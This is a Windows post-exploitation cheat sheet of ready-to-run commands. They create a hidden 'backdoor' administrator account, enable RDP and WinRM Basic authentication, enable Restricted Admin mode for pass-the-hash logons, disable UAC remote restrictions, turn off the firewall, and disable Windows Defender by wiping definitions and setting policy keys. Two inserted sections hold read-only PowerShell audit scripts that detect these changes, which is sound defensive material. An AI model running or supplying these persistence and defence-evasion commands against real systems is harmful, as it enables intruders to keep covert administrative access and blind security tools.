Post-Exploitation: Windows

Enable RDP access

Enable Terminal Services (allow incoming RDP connections):

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

Disable the firewall on all profiles:

netsh advfirewall set allprofiles state off

Enable RDP in a single command line (creates the user, adds it to the Administrators and Remote Desktop Users groups, hides it from the logon screen, enables Terminal Services and sets the service to start automatically):

net user /add (Username) (Password) && net localgroup administrators (Username) /add & net localgroup "Remote Desktop Users" (Username) /add & netsh advfirewall firewall set rule group="remote desktop" new enable=Yes & reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v (Username) /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /f & sc config TermService start= auto

Enable Restricted Admin mode so that RDP accepts pass-the-hash logons:

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

#pass the hash
xfreerdp /v:192.168.157.221 /u:backdoor /pth:"NTLM_hash" /dynamic-resolution /drive:linux,/opt

Add backdoor to local administrators group

net user backdoor Password1 /add
net localgroup administrators /add backdoor

Disable UAC remote restrictions for local accounts, which grants full admin rights over remote connections such as SMB and WMI:

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "LocalAccountTokenFilterPolicy" /t REG_DWORD /d 1 /f

Add user to Remote Management Users

#enable winrm
winrm quickconfig -force
winrm set winrm/config/service/auth '@{Basic="true"}'

#add user "test" to winrm group 
net localgroup "Remote Management Users" test /add
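The following PowerShell audit script is an added defender-side example and is not part of this cheat sheet. It reads back every setting the commands in the sections above change (Terminal Services, Restricted Admin, LocalAccountTokenFilterPolicy, hidden accounts in the Winlogon UserList, membership of the Administrators, Remote Desktop Users and Remote Management Users groups, WinRM Basic authentication, and the firewall profiles) and reports anything that is in the post-exploitation state. The expected-member baseline in $ExpectedMembers and the set of values flagged as suspicious are assumptions; adjust them to the host's known-good configuration.

```powershell
# Added audit example (not from the original cheat sheet). Run from an elevated
# PowerShell 5.1+ prompt. Baseline values below are assumptions for illustration.

$Findings = [System.Collections.Generic.List[string]]::new()

# Registry values the cheat-sheet commands set: path, value name, the value an
# attacker writes, and why it matters.
$RegistryChecks = @(
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
       Name = 'fDenyTSConnections'; Bad = 0
       Why  = 'RDP connections are allowed' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
       Name = 'DisableRestrictedAdmin'; Bad = 0
       Why  = 'Restricted Admin mode is on (RDP accepts NTLM-hash logons)' },
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
       Name = 'LocalAccountTokenFilterPolicy'; Bad = 1
       Why  = 'UAC remote restrictions disabled for local accounts' }
)

foreach ($c in $RegistryChecks) {
    # A missing value simply means "not set", so errors are suppressed.
    $item = Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue
    if ($null -ne $item -and $item.($c.Name) -eq $c.Bad) {
        $Findings.Add("[REG] $($c.Path)\$($c.Name) = $($c.Bad): $($c.Why)")
    }
}

# Accounts hidden from the logon screen via Winlogon\SpecialAccounts\UserList.
$userList = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
if (Test-Path $userList) {
    (Get-Item $userList).GetValueNames() | ForEach-Object {
        $Findings.Add("[REG] Account '$_' is hidden from the logon screen")
    }
}

# Local group membership compared against an expected baseline (assumption:
# only the built-in Administrator is expected; the remote groups are empty).
$ExpectedMembers = @{
    'Administrators'          = @('Administrator')
    'Remote Desktop Users'    = @()
    'Remote Management Users' = @()
}
foreach ($group in $ExpectedMembers.Keys) {
    $members = Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue |
        ForEach-Object { $_.Name -replace '^.*\\', '' }   # drop the COMPUTER\ or DOMAIN\ prefix
    foreach ($m in $members) {
        if ($ExpectedMembers[$group] -notcontains $m) {
            $Findings.Add("[GROUP] Unexpected member '$m' in '$group'")
        }
    }
}

# WinRM Basic authentication, which the "winrm set" command above turns on.
$basic = Get-Item -Path WSMan:\localhost\Service\Auth\Basic -ErrorAction SilentlyContinue
if ($basic -and $basic.Value -eq 'true') {
    $Findings.Add('[WINRM] Basic authentication is enabled on the WinRM service')
}

# Firewall profiles that have been switched off entirely.
Get-NetFirewallProfile | Where-Object { $_.Enabled -eq 'False' } | ForEach-Object {
    $Findings.Add("[FW] Firewall profile '$($_.Name)' is disabled")
}

if ($Findings.Count -eq 0) { 'No findings.' } else { $Findings }
```

The script only reads state; it makes no changes, so it is safe to schedule as a periodic compliance check. On a domain-joined host the Administrators baseline will normally also contain Domain Admins, so extend $ExpectedMembers rather than treating every hit as a finding.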

Turn off Windows Defender

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f

powershell -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true"

#disable firewall
NetSh Advfirewall set allprofiles state off
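As an added defender-side example (not code from this cheat sheet), the following PowerShell script checks whether Defender has been tampered with in the ways the commands above perform: it looks for the Group Policy keys written by REG ADD, the preferences flipped by Set-MpPreference, the effective engine state and signature age reported by Get-MpComputerStatus, and recent Defender operational events. The signature-age threshold and the lookback window are assumptions, and the event IDs are assumptions to be confirmed against Microsoft's Defender event reference before relying on them.

```powershell
# Added Defender tamper check (not from the original cheat sheet). Run elevated
# on Windows 10 / Server 2016 or later, where the Defender module is present.
# Thresholds and event IDs below are assumptions; verify them for your estate.

$Findings = [System.Collections.Generic.List[string]]::new()

# 1. Policy keys written by the REG ADD commands. A value of 1 here forces the
#    feature off by policy, which Set-MpPreference alone cannot revert.
$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
foreach ($name in 'DisableRealtimeMonitoring', 'DisableBehaviorMonitoring', 'DisableAntiSpyware') {
    $v = Get-ItemProperty -Path $policy -Name $name -ErrorAction SilentlyContinue
    if ($null -ne $v -and $v.$name -eq 1) {
        $Findings.Add("[POLICY] $policy\$name = 1")
    }
}

# 2. Preferences flipped by the Set-MpPreference command.
$pref = Get-MpPreference
foreach ($p in 'DisableRealtimeMonitoring', 'DisableBehaviorMonitoring',
               'DisableIOAVProtection', 'DisableIntrusionPreventionSystem') {
    if ($pref.$p -eq $true) { $Findings.Add("[PREF] $p is set") }
}

# 3. Effective engine state and signature freshness. MpCmdRun -removedefinitions
#    leaves the engine without usable signatures, which shows up as a large age.
$status = Get-MpComputerStatus
if (-not $status.RealTimeProtectionEnabled) { $Findings.Add('[STATUS] Real-time protection is off') }
if (-not $status.BehaviorMonitorEnabled)    { $Findings.Add('[STATUS] Behavior monitoring is off') }
if (-not $status.IoavProtectionEnabled)     { $Findings.Add('[STATUS] IOAV (download/attachment) scanning is off') }
if (-not $status.AntivirusEnabled)          { $Findings.Add('[STATUS] Antivirus engine is disabled') }

$maxSigAgeDays = 3   # assumption: tune to the normal signature update cadence
if ($status.AntivirusSignatureAge -gt $maxSigAgeDays) {
    $Findings.Add("[SIG] Signatures are $($status.AntivirusSignatureAge) days old (version $($status.AntivirusSignatureVersion))")
}

# 4. Defender operational events from the last 7 days (assumed IDs: 5001
#    real-time protection disabled, 5004 real-time configuration changed,
#    5007 configuration changed, 5010 scanning disabled, 5013 tamper attempt blocked).
Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 5001, 5004, 5007, 5010, 5013
    StartTime = (Get-Date).AddDays(-7)
} -ErrorAction SilentlyContinue | ForEach-Object {
    $firstLine = ($_.Message -split "`r?`n")[0]
    $Findings.Add("[EVENT] $($_.TimeCreated) id=$($_.Id): $firstLine")
}

if ($Findings.Count -eq 0) { 'No findings.' } else { $Findings }
```

Checking all four layers matters because they fail independently: a policy key can force a feature off even though Get-MpPreference reports it enabled, and a definitions wipe leaves every protection flag true while the engine has nothing to match against. Forwarding the Defender operational log to a central collector preserves these events even if the host is later cleaned up.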
